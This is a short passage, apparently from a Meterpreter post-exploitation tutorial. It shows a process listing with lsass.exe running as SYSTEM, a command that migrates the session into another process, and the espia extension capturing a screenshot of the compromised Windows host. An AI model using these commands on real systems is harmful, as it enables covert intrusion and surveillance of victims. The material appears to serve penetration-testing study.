     488   372   lsass.exe          x86   0        NT AUTHORITY\SYSTEM           C:\windows\system32\lsass.exe
    ...
    meterpreter > migrate 3104
    [*] Migrating to 3104

0x0F Screenshots


    meterpreter > use espia
    Loading extension espia...Success.
    meterpreter > screen
    screengrab  screenshot  
    meterpreter > screengrab
    Screenshot saved to: /home/daiker/zQBKZbTv.jpeg
